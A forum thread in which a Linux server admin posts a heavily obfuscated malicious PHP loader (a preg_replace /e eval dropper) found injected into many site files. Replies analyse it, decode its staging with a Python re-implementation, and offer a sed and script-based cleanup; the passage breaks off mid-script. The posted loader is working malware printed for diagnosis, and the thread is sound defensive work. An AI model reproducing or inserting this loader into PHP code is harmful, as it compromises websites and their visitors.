LinuxQuestions.org > Linux - Server: This forum is for the discussion of Linux software used in a server-related context.
08-26-2014, 02:45 AM
#1
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Some virus/malware in my PHP script
I just noticed that on one of my servers I've got a lot of infected PHP files:
Code:
<?php $vucprjnldo = 'x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%167822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x78]252]y85]256]y6g]257]y86]2%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5323ldfid>}&;!osvufs}%x5c%x787f;!opjudov{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!77]y72]265]y39]274]y85]273f#00;quui#>.%x5c%x7825!<***f%x5c%0hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x782y74]256#<!%x5c%x7825ggvg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!x5c%x7860un>qp%x5c%x7825!|Z~!<##!25z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5)%x5c%x7825z>>2*!%x5c%x7825z>35!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%bz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5825kj:-!OVMM*<(<%x5c%x78e%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsx67%42%x2c%163%x74%162%x5f%163%x70%154%x60%x5c%x7825}X;!sp!*#opo#>>}R;7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x782osvufs!|ftmf!~<**9.-j%x5c%xj{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:*%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudo%x5c%x7825c:>1<%x5c%x7825b:>1<!gps24*<!%x5c%x7825kj:!>!#]y3d]51]y35]!*uyfu%x5c%x7827k:!ft27pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x725!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7eu{66~67<&w6<*&7-#o]s]o]s]#)fc%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x782c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x782539*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275]#>s%x5c%x7825<#462]47y]252]18F.uofuopD#)sfebfI
{*w%x5c%x7825)kV%x5c%x7878{*oj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%c%x782f!#0#)idubn%x5c%x786x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78257825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<%x782fq%x5c%x7825>2q%x5c%x7msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%25t::!>!%x5c%x7824Ypp3)%x5c%x7825cB:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x74%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7]y6g]273]y76]271]y7d]252]y74]256]4gvodujpo!%x5c%x7824-%x5c%x7824y7%7]278]225]241]334]368]322]3]364]6]283]427]36]373P%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x782jA)qj3hopmA%x5c%x78273TQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825mm!>!#]y81]273]y76]2585))!gj!<*#cd2bge56+99386c6f+9f5d816:5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x78:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878]445]43]321]464]284]364]6]234]342]58]24]31#-ZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R33f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x7x6f%142%x5f%163%x74%141%x72%164"y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c_;gvc%x5c%x7825}&;ftmbg}%x5c%x787x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x55w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%z!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]%x5c%x7825!<*::::::-111112)eobs%x7825zW%x5c%x7825h>EzH,2W%x5c%x%x5c%x7825j=tj{fpg)%xx785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C>U<#16,47R57,27R66,#%x5c5>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782SFEBFI,6<*127-UVPFNJU,6<*27-7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-x
7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%xc%x7878pmpusut)tpqssutRe%x5c%x7825x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!8257**^#zsfvr#%x5c%x785cq%x5c%xj%x5c%x7825>j%x5c%x7825!<25j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%xf_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUU825%x5c%x7824-%x5c%x7824b71]y83]256]y78]248]y8x78242178}527}88:}334}472%x5c%x7824<!%5c%x7825z>!tussfw)%x5c%c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786f;!osvufs}w;*%x5c%x787f!>>dXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fe860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%e:56-%x5c%x7878r.985:52985-t.98]K4]65%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c8246767~6<Cw6<pd%x5c%x782x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)vt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x782epdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5hx7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%8b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]8]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", 
c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j+A!>!{e%x5c%x7825)!>>%x5c%x!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x]y3e]81#%x5c%x782f#7e:55946-*#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7tww**WYsboepn)%x5c%x7825bss-%x5c%x782%x7825bbT-%x5c%x7825bT-3]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]7}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdotr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpx5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x785cSFWSFT%x5c%x78c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQe?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]2!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c5l}S;2-u%x5c%x7825!-#2#%xNULL); }6%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)-1);}>!2p%x5c%x7825!|!*!***b%x5c%69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%5087fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y5r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.*#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;67]y74]275]y7:]268]y7f#<!%x5c%x5)!gj!|!*1?hmg%x5c%x7825)!gj256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x78x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x782%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x782727825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x78g}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<4-%x5c%x7824]y8%x5c%x7824-%x5c%xif((function_exists("%197-2qj%x5c%x78257-K)udfoopd
XA%x5:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%15pmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827d%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-mf!}Z;^nbsbq%x5c%x7825%x5cx7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)f)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x78id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujoc%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XA7f%x5c%x787f%x5c%x787f<u%x5sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x7bubE{h%x5c%x7825)sutc<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x7826<%x5c%x787fw6*3qj%x5c%x78257>%x5c5rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x78%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3q372]58y]472]37y]672]48y6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212jRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7y]}R;2]},;osvufs}%x5c%x7827;mnui%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x782]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]I&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbekc%x7824-tusqpt)%x5c%x78%x7860msvd}+;!>!}%x5c%x7827;!>>>!}y39]252]y83]273]y72]282#<x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x57,#%x5c%x782fq%x5c%x7825Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>7825wN;#-Ez-1H*WCw*[!%x5c%x782]D8]86]y31]278]y3f]51L3]84]y31M6x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!sbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x782565!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*w6Z6<.3%x5c%x7860hA%x5!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5cx7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x%x5c%x7825%x5c%x7878:!>#]y3g]61]yx7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#
sfmcnbs+yfeo!osvufs!~<3,j%x5c%x7825c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%qj%x5c%x78256<^#zsfvr#%x5c%x%x5c%x7825tdz>#L4]275L3g)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]2x5c%x7825j>1<%x5c%x7825j=6[%x593e:5597f-s.973:8297f:5297c%x785cq%x5c%x7825%x5c%x7827j @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%0LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K25r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&~6<%x5c%x787fw6<*K)ftpmdXA6|7**epmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x78)Rd%x5c%x7825)Rb%x5c%x7827825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bs/(.*)/epreg_replacesdvmuozaib'; $teylojttvr = explode(chr((307-263)),'7400,22,3129,32,7525,69,6305,61,9709,65,0,62,7003,49,1005,40,6394,54,9371,33,3071,58,4914,25,3496,68,2084,43,9232,22,6943,60,1456,43,1651,30,9943,46,4728,54,3767,58,3415,40,5191,61,8997,61,9912,31,7422,33,4525,47,9774,43,8079,34,8156,48,2621,22,7052,49,9528,28,8693,52,9680,29,7951,42,4232,31,7101,53,2356,50,969,36,4598,66,7594,36,2007,51,9302,69,3917,61,3889,28,6820,56,7820,43,8285,70,6448,61,5668,63,4664,64,9254,48,8593,34,3323,33,4572,26,1329,38,532,65,1140,27,10014,39,9462,22,3849,40,766,64,7259,42,1681,47,9058,53,4263,25,1774,41,5080,59,6669,28,6229,43,7630,47,7993,21,4996,44,5513,59,9484,44,8652,41,5252,69,8882,61,8014,65,327,33,7703,59,5139,52,3617,32,597,33,6366,28,9404,58,870,67,2058,26,360,37,4095,34,9989,25,2738,36,9868,44,4352,66,8509,61,7154,57,1581,70,3455,41,1728,46,1435,21,7677,26,6100,20,1045,30,2213,48,4939,57,212,39,7211,48,1875,57,1167,61,5600,68,251,50,5486,27,62,56,7924,27,7863,61,3015,56,8745,24,3825,24,2186,27,5919,50,1962,45,6576,62,8355,32,5861,58,1075,65,6272,25,9173,59,6176,53,301,26,2464,33,8627,25,669,67,6876,67,118,26,6638,31,2127,59,4782,45,3978,55,6751,69,2902,69,397,48,8204,23,1932,30,3161,69,2296,60,4464,38,2707,31,10053,53,8943,54,2580,41,2406,58,4418,25,1294,35,8570,23,630,39,8387,56,7368,32,445,65,2497,34,9111,62,3680
,21,2774,70,2844,58,1401,34,6697,54,2261,35,144,68,6120,56,2643,64,3356,59,4502,23,3649,31,8820,30,8113,43,9817,51,4129,50,5731,37,6509,67,9654,26,4827,37,8850,32,5572,28,5969,68,3564,53,7301,67,9556,23,8443,66,8769,51,4864,50,5768,23,1499,35,3230,50,2531,49,8227,58,2971,44,830,40,3701,66,6037,63,1367,34,7762,58,4288,64,1815,60,5450,36,7455,70,9624,30,4179,53,736,30,4033,62,1534,47,3280,43,1228,66,5040,40,937,32,5321,60,510,22,9579,45,4443,21,5791,70,5381,69,6297,8'); $mawuedtwim=substr($vucprjnldo,(51847-41741),(21-14)); if (!function_exists('uwundfcpyb')) { function uwundfcpyb($caehqyfhhy, $qptunmxljk) { $gxowzmlndd = NULL; for($taijuorzga=0;$taijuorzga<(sizeof($caehqyfhhy)/2);$taijuorzga++) { $gxowzmlndd .= substr($qptunmxljk, $caehqyfhhy[($taijuorzga*2)],$caehqyfhhy[($taijuorzga*2)+1]); } return $gxowzmlndd; };} $tojphvmjdb="\x20\57\x2a\40\x61\167\x6f\145\x6f\163\x62\146\x76\162\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x34\55\x31\66\x37\51\x29\54\x20\143\x68\162\x28\50\x34\65\x33\55\x33\66\x31\51\x29\54\x20\165\x77\165\x6e\144\x66\143\x70\171\x62\50\x24\164\x65\171\x6c\157\x6a\164\x74\166\x72\54\x24\166\x75\143\x70\162\x6a\156\x6c\144\x6f\51\x29\51\x3b\40\x2f\52\x20\163\x69\166\x6c\153\x70\144\x6e\165\x6e\40\x2a\57\x20"; $bmnrgccpri=substr($vucprjnldo,(56718-46605),(42-30)); $bmnrgccpri($mawuedtwim, $tojphvmjdb, NULL); $bmnrgccpri=$tojphvmjdb; $bmnrgccpri=(506-385); $vucprjnldo=$bmnrgccpri-1; ?>
Does anybody know how to clean my PHP files without removing them, of course?
08-26-2014, 03:00 AM
#2
LQ Newbie
Registered: Jul 2012
Posts: 19
Can you find where it's being executed?
08-26-2014, 03:10 AM
#3
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
No, or not sure how; it seems that a lot of PHP files are infected.
---------- Post added 08-26-14 at 10:11 ----------
BTW, I tried clamscan, but it doesn't seem to find the malware as an infection or issue.
08-26-2014, 03:19 AM
#4
LQ Newbie
Registered: Jul 2012
Posts: 19
I'm trying to decrypt the code now.
08-26-2014, 03:39 AM
#5
LQ Newbie
Registered: Jul 2012
Posts: 19
I've found where it's being executed. I've never seen PHP execute like this before.
The eval is inside the $tojphvmjdb variable, and for some reason PHP is executing it. I think it's passing the $tojphvmjdb variable into the $bmnrgccpri variable, and then PHP is executing it as a function (Since it has the brackets after it).
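What the post above describes can be read off the blob itself. `$mawuedtwim` is a 7-character `substr` of the blob ((21-14) = 7) and `$bmnrgccpri` a 12-character one ((42-30) = 12); the run `/(.*)/epreg_replace` is visible near the end of the blob, and `$tojphvmjdb`, once its `\xHH` and `\OOO` escapes are decoded, reads ` /* awoeosbfvr */ eval(str_replace(chr((204-167)), chr((453-361)), uwundfcpyb($teylojttvr,$vucprjnldo))); /* sivlkpdnun */ ` (chr(37) is `%`, chr(92) is `\`). So the last line of the loader is `preg_replace('/(.*)/e', '<that eval wrapper>', NULL)`: the `/e` modifier (deprecated in PHP 5.5, removed in 7.0) evaluates the replacement as PHP, the empty subject still matches `(.*)`, and the replacement runs once. `uwundfcpyb()` stitches the real payload out of the blob using the comma-separated offset/length pairs in `$teylojttvr` (`explode(chr(44), ...)`), `%` is swapped for `\`, and PHP's string lexer then turns `%x6f%142%x5f%163%x74%141%x72%164` into `ob_start` and `%x61%156%x75%156%x61` into `anuna`, which is exactly the decoded fragment quoted later in this thread. The Python below is an added re-implementation of that staging layer by the editor, not code from the thread or from the malware. It runs against a small constructed blob: the sample text and offsets are made up for the demo, only the decoding rules are taken from the posted script, and `php_unescape()` is an approximation of PHP's double-quoted string escapes applied to the whole text for readability.

```python
import re

# Re-implementation of the stitching done by uwundfcpyb() in the posted blob:
# pairs is [offset, length, offset, length, ...]; each pair copies one slice of
# the blob into the output, in pair order rather than blob order.
def stitch(pairs, blob):
    out = []
    for i in range(len(pairs) // 2):
        off, ln = pairs[2 * i], pairs[2 * i + 1]
        out.append(blob[off:off + ln])
    return "".join(out)

# Mirrors explode(chr(44), '...') on the offset list.
def parse_pairs(csv):
    return [int(x) for x in csv.split(",") if x != ""]

# Approximation of what PHP's lexer does with \xHH and \OOO inside a
# double-quoted string; applied to the whole text here, which is fine for a demo.
def php_unescape(s):
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})", repl, s)

# One full stage: stitch, str_replace('%', '\\'), then decode the escapes.
def decode_stage(pairs_csv, blob):
    stitched = stitch(parse_pairs(pairs_csv), blob)
    return php_unescape(stitched.replace("%", "\\"))

# Inner layer from the decoded fragment: fjfgg() is chr(ord($n)-1) per character.
# Some fragments are additionally stored reversed and undone with strrev() at
# run time ("tussfw" itself shifts to "strrev").
def unshift(s):
    return "".join(chr(ord(c) - 1) for c in s)

# --- constructed sample blob (not the one from the page) --------------------
# Pieces sit in scrambled order with "##" filler between them, so the offset
# list below does the reordering, exactly as the real $teylojttvr does.
SAMPLE_BLOB = (
    "##"
    "%x6f%142%x5f%163%x74%141%x72%164"   # offset   2, len 32 -> "ob_start"
    "##"
    "/(.*)/e"                            # offset  36, len  7 -> the regex
    "##"
    '"]=1;}'                             # offset  45, len  6
    "##"
    "preg_replace"                       # offset  53, len 12 -> the function
    "##"
    'if(function_exists("'               # offset  67, len 20
    "##"
    "%x61%156%x75%156%x61"               # offset  89, len 20 -> "anuna"
    "##"
    '")){$GLOBALS["'                     # offset 111, len 14
)
SAMPLE_PATTERN_SLICE = (36, 7)    # like substr($vucprjnldo,(51847-41741),(21-14))
SAMPLE_FUNC_SLICE = (53, 12)      # like substr($vucprjnldo,(56718-46605),(42-30))
SAMPLE_PAIRS_CSV = "67,20,2,32,111,14,89,20,45,6"   # like $teylojttvr

def sample_loader_call():
    """Return (function, pattern) that the loader's last line resolves to."""
    fo, fl = SAMPLE_FUNC_SLICE
    po, pl = SAMPLE_PATTERN_SLICE
    return SAMPLE_BLOB[fo:fo + fl], SAMPLE_BLOB[po:po + pl]

def sample_payload():
    """What eval() would receive after the stage-one decode."""
    return decode_stage(SAMPLE_PAIRS_CSV, SAMPLE_BLOB)

if __name__ == "__main__":
    func, pat = sample_loader_call()
    print(f"loader call: {func}('{pat}', <eval wrapper>, NULL)")
    print("stage-one payload:", sample_payload())
    print("unshift('tussfw') =", unshift("tussfw"))
    print("strrev(unshift('osvufs')) =", unshift("osvufs")[::-1])
```

On a real sample, feed `decode_stage()` the verbatim single-line blob and the `explode` list and repeat on whatever the output still hides; the page's copy of the blob has been wrapped by the forum software, so its offsets no longer line up and it cannot be decoded from this thread as posted.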
08-26-2014, 04:24 AM
#6
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
OK, cool, thanks for the analysis, but how can I remove all of this from all PHP files?
08-26-2014, 04:39 AM
#7
LQ Newbie
Registered: Jul 2012
Posts: 19
This is going to take ages to reverse, but put this code at the top of your files:
if (!function_exists('uwundfcpyb')) { function uwundfcpyb() { return false; } }
That should stop it from executing. You'll need to do this in all infected files (You won't need to do it to any files that they include though, it only needs to run once at execution time).
When I say "should" I mean to say I have no idea how it's executing, but I do know that it requires that function to open up the rest of the code.
To remove it? That's a manual job.
08-26-2014, 04:44 AM
#8
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Well, that's not nice, but I guess your idea is pretty OK. I will try to see how to implement this the easy way.
Thanks again for the great work.
08-26-2014, 04:50 AM
#9
LQ Newbie
Registered: Jul 2012
Posts: 19
How did you find it? Like, what is it doing?
I've pulled some of it apart and it tries really hard to hide itself.
Quote:
if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { $GLOBALS["anuna"]=1; function fjfgg($n){return chr(ord($n)-1);} error_reporting(0);
That's some of it I've been able to get.
08-26-2014, 05:18 AM
#10
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Well, I didn't do any kind of magic; I just opened one of the PHP files, as the website didn't work as expected, and I noticed that there was some code which shouldn't be there.
08-26-2014, 06:41 AM
#11
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Actually I've found that this little script might actually do the job:
find . -name '*.php' -print0 | while IFS= read -r -d '' f; do sed -i '/vucprjnldo/ s/<?php.*?>//' "$f"; done
At least for one of the WordPress sites it worked like a charm.
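The sed one-liner above works because the injected block sits on one line that contains the marker variable name. Two caveats a practitioner would want: the greedy `.*?>` also eats any legitimate `?>` that follows the blob on the same line (the blob is prepended directly in front of the site's own `<?php`), and `sed -i` leaves nothing to diff against. The script below is an added example by the editor, not code from the thread. It removes only the span from `<?php $vucprjnldo = '` to the blob's own closing `$vucprjnldo=$bmnrgccpri-1; ?>` (both anchors are the variable names visible in the posted sample; another campaign renames them, so the two constants must be updated), writes a `.bak` next to each changed file, and reports what it did. It also carries a rough heuristic for files that hold a loader of the same shape under other names (a very long single-quoted string, `substr()` with arithmetic arguments, and a variable used as a function name with `NULL` as last argument); treat its hits as triage, not verdicts. The sample file content is constructed for the demo.

```python
import os
import re
import shutil

# Anchors taken from the sample posted in the thread. The injected block starts
# with "<?php $vucprjnldo = '" and ends with "$vucprjnldo=$bmnrgccpri-1; ?>".
# A different campaign uses different names; update both before reuse.
START_VAR = "vucprjnldo"
END_VAR = "bmnrgccpri"
INJECTED = re.compile(
    r"<\?php\s+\$" + START_VAR + r"\s*=\s*'.*?"
    r"\$" + START_VAR + r"=\$" + END_VAR + r"-1;\s*\?>",
    re.DOTALL,
)

# Loose heuristic for loaders of the same shape but other variable names:
# a single-quoted string of 1 kB or more, substr() with (N-M) arguments, and a
# variable called as a function with NULL as the last argument.
LONG_STRING = re.compile(r"'[^']{1024,}'")
SUBSTR_ARITH = re.compile(r"substr\(\$\w+,\(\d+-\d+\),\(\d+-\d+\)\)")
VAR_FUNC_CALL = re.compile(r"\$\w+\(\$\w+,\s*\$\w+,\s*NULL\)")

def looks_like_loader(text):
    return bool(LONG_STRING.search(text) and SUBSTR_ARITH.search(text)
                and VAR_FUNC_CALL.search(text))

def strip_injected(text):
    """Return (cleaned_text, number_of_blocks_removed)."""
    return INJECTED.subn("", text)

def clean_tree(root, dry_run=True):
    """Walk root, strip the block from every .php file, keep a .bak copy.
    Returns a list of (path, blocks_removed, heuristic_hit_after_cleaning)."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
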